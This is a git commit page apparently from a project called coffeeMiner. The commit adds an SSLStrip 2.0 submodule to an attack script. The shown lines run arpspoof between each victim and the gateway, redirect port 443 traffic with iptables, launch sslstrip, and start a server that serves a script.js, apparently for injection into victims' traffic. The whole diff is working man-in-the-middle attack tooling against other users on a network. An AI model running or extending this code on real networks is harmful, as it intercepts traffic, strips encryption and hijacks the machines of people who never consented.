Browse Source

Added SSLStrip 2.0

pull/5/head
Chase Taylor 7 years ago
parent
commit
0982f535b0
3 changed files with 7 additions and 0 deletions
  1. +3
    -0
      .gitmodules
  2. +3
    -0
      coffeeMiner.py
  3. +1
    -0
      sslstrip

+ 3
- 0
.gitmodules

@ -0,0 +1,3 @@
[submodule "sslstrip"]
path = sslstrip
url = https://github.com/byt3bl33d3r/sslstrip2

+ 3
- 0
coffeeMiner.py

@ -39,6 +39,9 @@ os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRE
for victim in victims:
os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
# run SSLStrip on port 8000
os.system("python sslstrip.py -l 8000 &")
# start the http server for serving the script.js, in a new console
os.system("xterm -hold -e 'python3 httpServer.py' &")

+ 1
- 0
sslstrip

@ -0,0 +1 @@
Subproject commit 8dac3873890b25819a1c1191cbd5de96d3dba219

Loading…
Cancel
Save